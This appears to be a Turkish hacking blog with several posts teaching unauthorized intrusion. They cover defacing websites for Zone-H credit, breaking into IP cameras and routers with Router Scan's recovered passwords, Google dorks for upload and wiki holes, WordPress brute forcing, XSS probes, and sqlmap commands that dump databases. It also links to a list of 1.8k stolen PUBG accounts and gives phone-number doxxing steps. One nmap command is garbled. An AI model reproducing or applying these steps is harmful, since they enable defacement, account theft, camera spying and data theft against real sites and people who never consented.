Virtuoso Method's

22 Ekim 2022 Cumartesi

Zone-h kasma teknikleri anlatım

1-) SubDomain ( Alt Domain )

Hacklediğimiz Sitenin Mainine İndex Attıktan Sonra İşim Bitti Diyipte Çıkmayın , Shellden SubDomainlerede Selam Çakın : , Genellikle Her Sİtede SubDomain Oluyor örn.( Ben Bir Siteden 40 50 SubDomain Vurduğumu ) Hatırlıyorum , Peki Bunu Nasıl Yapıcaz ? Diyorsanız Kısaca Açıklama Vereyim; /public_html Kısımında Yerleşen SubDomainlerdir , Bunlara Aynı Şekilde İndex Ata Bilirsiniz ...

2-) Config Çekin
Shellden Config Çekmeyi Bilmeyen Yoktur Diye Düşünüyorum :D : , Zaten Direk Önünüzde Beliriyor Tek Yapmanız Gereken Ctrl+C/V Kullanmak , Normalde Configden Site Düşme İhtimali ( 12.55% ) Dir Ancak Şanslı Gününüzdeyseniz 10 15 Site Çıkara Bilirsiniz :

3-) Reverse İP
Bu Siteden Tarata Bilirsiniz , Örn.(Hacked.com) Sitesinin Reverse İP İle Denetlerken (Hacked.org) Çıktı , (Hacked.com) Hacklediğimiz Yöntemle Diğer Tüm Siteleri Hackleye Biliriz , Tabi Çok Kullanışlı Bir İşlem Değil :ddD

-) Error İndex
Şimdi Şöyle Diyeyim Sitede Error.php Dizini Var , Sİz İndexinizi Maine Atacağınıza Error.php Kısımına Atıyoruz ve Tüm Hatalı "URL" lerde İndeximiz Gözüküyor :D
Örn. ( denemetht.com) sitesinin error.php sine index attıysanız

deneme.virtuoso.com/hackedhacked
deneme.virtuoso.com/adminadmin
deneme.virtuoso.com/llsadaasdadas
deneme.virtuoso.com/hacked
deneme.virtuoso.com/aisdadaoiasod
deneme.virtuoso.com/denemehacked

hepsinde error verecek ve İndexiniz Gözükecektir ve Sizde Zonenizi Kasacaksınız :
NOT :  , Zone-H Sitesi  Bu Methodla Alınmış Zoneleri Kabul Etmiyor ...

5-) Server Root ( sv root )
En Fazla Zoneyi Burdan Kasacaksınız ... Eğer Bu İşlerden Pek Anlamıyorsanız Bunun Üzerinde Pek Çalışmayın , Exploitle Çalışmamız Gerekiyor Bu Yöntemle , Çalışan Exploitleri Bulmak İse Günümüzde İmkansız , Daha Çok Virüslü Oluyorlar ... Bununla İlgili Konu Açıcam O Yüzden Pek Abartmıyorum ...

6-) Upload Açığı
Upload Açıklarından Yararlanın , Tüm Upload Açıkları 500 600 Kadar Ediyor ve Büyük Sayıda Zone Demektir , Ben Bunu Lamerlik Algılamıyorum Sonuçta Bir Açıktan Yararlanıyoruz :D: , inurl:"powered by phpuploader" gibi dorklarla Upload Açıklı Sitelere İndex Ata Bilirsiniz ...
Zone-h Tarafından Desteklenmektedir blogun altına salak salak lamer yazmayın..

Web Site hackleme Aracı BURP SUİTE nasıl kurulur

Burp Suite Nedir ?

Burp Suite; web uygulama güvenliğini test etmek için kullanılan bir platformdur.
PortSwigger şirketi tarafından geliştirilmiş ve Java programlama diliyle yazılmıştır.
Grafik arayüzü olduğu gibi terminal aracılığı ile de platforma erişim sağlanabilir.

Burp Suite Nasıl Kurulur ?

ÖNEMLİ

* İlk Olarak Kendi İşletim Sistemimize Sonra Sanal Makinamız Kali Linuxa Kuracağız.
* Kali Linux Kurmadıysanız Bunun İçin Bir Çok Kaynak Var VirtualBox Kurmakla Başlayabilirsiniz.

1 - İLK OLARAK JAVAYI KURMALIYIZ.

* Hata Alırsanız Java Sürümünüz Eskidir Güncelleyin.

- Java Link : https://www.java.com/download/ie_manual.jsp

2 - BURP SUİTE SİTESİNDEN İNDİRİYORUZ

- Link : Professional / Community 2022.8.3

3 - EXE DOSYASINI AÇIYORUZ

*Next diyerek geçin hepsini

4 - İşletim Sistemi Uygulamalar Kısmı/Arama Çubuğuna Burp Suite Yazıp Açıyoruz.

* Resimde GÖrdüklerinizi Aynı Olacak Şekilde Yapın.

* Kurulum Bitti Şimdi Proxy Sunumucuz Olarak Ayarlayalım.

5 - Chorma girin

6- Ayarları Açın

7- Arama Motoruna Girip Resimde ki Gibi "proxy" yazın

8 - " Bilgisayarınızın proxy ayarlarını açın " Bu Kısma Basın Ve Ayarlara Giricek

9 - Resimdeki Gibi Ayarlayın

* IP & Port Aynısını Yazıp Kaydedin.

10 - Chorme Açın ve "127.0.0.1:8080" Yazıp Girin

* Burda Lisans Almış Olucaz Almazsak Eğer Sürekli Hata Verir.

11 - "CA Certificate" Yazısına basın ve indirilen dosayayı açın

12 - Sertifika Yükle Diyoruz.

* Sizde 1. Seçilidir Onu Alttakine Alın Resimdeki Gibi Ayarlayın.

13 - GÖZAT DİYİN

14 - "Güvenlik Kök Sertifika Yetkikileri" Diyip Tamam Diyin

Tamam Diyin Sonraki ve Son Diyerek Sertifika da Almış Olduk.

| ŞİMDİ GELELİM KALİ LİNUX AÇALIM |

1 - Terminali Açın "burpsuite" yazın

* İleri (NEXT) Diyerek Devam Edin

2 - Kali Linuxtan FİreFox Girin "foxyproxy" Yazın

* Eklentiyi Kurun
* Sağ Tarafta Simgesi Gelicek Üstüne Basıp "Options" Diyoruz
* ADD "+" Kısmına Basıyoruz

3 - "Proxy IP address or DNS name" kısmına " 127.0.0.1 " yazıyoruz.
4 - " Port " Kısmına " 8080 " Yazıyoruz.

* Gerisi Boş Kalabilir.

5- İşletim sisteminde ki gibi FireFox tarayıcısına 127.0.0.1:8080 yazıp Kali Linux sisteminede sertifika almış olucaz

* Dosya İnicek Ama Bu Sefer Açmayın Dosyasyı

6 - FİreFox Ayarlarına (Settings) Girin
7 - Arama Kısmına "Cert" Yazdığınız Zaman Çıkıcak "Certificates" Karşısında "Vİew Certificates" Yazıcak Ona Basıyoruz.
8 - "Authorities" Kısmından "İmport" Diyoruz.
9 - İndirilen dosyayı seçin "open" diyin.

| KENDİ BİLGİSAYARINIZDAN AYARLARDAN PROXY AYARLADIĞINIZ AYARI KAPATIN SORUN YARATIR. |

| BURPSUİTE KULLANIMI DA GELİCEK |

21 Ekim 2022 Cuma

Router Scan.: Kamera ve admin panel hackleme [TR]

Bu konumuzda başlıktan da belli olduğu şekilde Router Scan kullanımını anlatıcam. Bu programa alternatif "Angry IP Scanner" var ama o sadece açık makineleri buluyor. Bu program ise açık makineleri ve onların şifrelerinide veriyor.

1- Öncelikle aşağıda verdiğim programı indiriyorsunuz.
http://stascorp.com/load/1-1-0-56
2- Programı indirdikten sonra "Router Scan.exe" dosyasını çalıştırıyorsunuz.

3-Burda İP aralıklarını bulmak için şu adrese gidin
https://www.nirsoft.net/countryip/tr.html

4-Burdaki İP aralıklarını programa girin.
(sol üstteki boş alanda + tuşuna basıp) enter ip's olan

5- Sonra sol üstte "Start Scan" butonuna basıyoruz ve program çalışmaya başlıyor.

6- Burda "Good Results" bölümüne gidiyoruz. Bekledikten sonra İP'ler ve daha bir çok bilgi karşımıza geliyor.

7-Bu bölümde kamera hacklediyseniz "Device Type" bölümünde "IP Camera" yada "DVR Client" yazar.

8- Hacklediğiniz IP'ye tarayıcınızda gidiyorsunuz ve programın size verdiği şifreyi giriyorsunuz. Ve artık girdiniz.

((eğer kameralarda görüntü yoksa IE Tab adlı eklentiyi googleye ekleyin ve sayfayı o ekletiyle çalıştırın))

nmap router.scan.7787 98.477.88.123

Numaradan Kişi bulma (İllegal yöntemsiz)

1-Truecaller

http://truecaller.com bu siteye kaydolun ve numarayı arayın %30 ihtimalle ad soyadı çıkar.

2-Whatsapp

Hedef numarayı kaydedin ve WhatsApp hesabına bakın. Belki fotoğrafına/ad soyadina erisilsiniz.

3-Facebook

Hesabımı unuttum yerinden hedef numarayı yazın eğer numara bir facebook hesabına bağlıysa karşınıza hesap gelir. Hesaba gidip bilgi toplayabilirsiniz.

Bir Kişinin Kullandığı Socia Media Hesaplarını Bulma (linux)

Aynı kullanıcı adının 75'ten fazla sosyal ağlardaki hesaplarını bulmak içindir

terminali açalım ve başlıyalım

git clone https://github.com/issamelferkh/userrecon

cd Downloads

cd Masaüstü, cd Desktop

cd userrecon

chmod +x userrecon.sh

./userrecon.sh

Geriye kalan tek şey kullanıcı adını yazmak. Örn : virtuoso41

Pubg 1.8k adet hesap FRESH

https://justpaste.it/6nas3

Site h4ck1ng methodları anlatım

1 - Upload Açığı ile site hackleme

Dork: intitle:"Powered by Phuploader"

Bunu Googlede aratırıyoruz ve sitelere tek tek indeximizin resmini yada html dosyasını yüklüyoruz.

2 - Waka wikii açığı ile hackleme

Dork: wakka.php?wiki=

Örnk: hacktivizm.org/wikini/wakka.php?"wiki=7juin/edit" linkin sonuna /edit koyuyoruz

Not: Siteye zarar vermez sadece zone kasmak icin kullanılabilir

3 - Brute Force ( Kaba Kuvvet )

Bu bir açık değildir. site üzerinde belirlenen admin - admin listesini kontrol eder ve olumlu sonucları size gösterir.

Dorukumuz:

/wp-content/plugins/hits

/wp-content/plugins/last

/wp-content/plugins/send

/wp-content/plugins/note

/wp-content/plugins/climb

/wp-content/plugins/sorry

/wp-content/plugins/gear

/wp-content/plugins/nothing

/wp-content/plugins/all

/wp-content/plugins/after

Arama motor isimli programımıza yapıştırıp araya basıyoruz bulunan siteleri kaydetip brute force adlı programımızı açıyoruz

Admin Ve Passlarımız ekliyip başlata basıyoruz. bulunan sonuclar alta gözükücektir. (DETAYLI BİLGİ İCİN @ghostkurts a instgram yolu ile iletisime geciniz)

4 - XSS Açığı

bu benim en çok kullandım açıklardan biridir.

Dorkumuz: index.php?id=

rasgele sitede bulunan arama butonlarına <script>alert(“Ghost Kurts”);</script> yapıştırıyoruz

Örnek:(hacktivizm.org/index.php?id=<script>alert(“Ghost Kurts”);</script> )

Not : Her Sitede 100% XSS Açık Olacak Diye Birşey Yok

5 - SQL Açığı

En Fazla Kullanılan Açıktır ve Çok Sağlam Zararlar Vura Biliriz.

Bilgisiyarımıza sqlmap kurduktan sonra cmdye açıyoruz ve şu komutları yazıyoruz.

cd ..

cd sqlmap

sqlmap.py -u www.virtuoso41.blogstop.com/index.php?id=5 --dbs

Karşımızda Aşağılarda " available_database " Olacaktır Onun Altındakiler Bizim Databaselerimiz

Sonrasında İstediğimiz Databaseden Veri Çekmeye Başlıyoruz

sqlmap.py -u www.virtuoso41.blogspot.com//index.php?id=5 -D Databaseismi --tables

sqlmap.py -u www.virtuoso41.blogspot.com/index.php?id=1 -D Databaseismi -T veriadı -C kolon1,kolon2,kolon3 --dump

SqlMap İndirme Linki: https://sqlmap.org/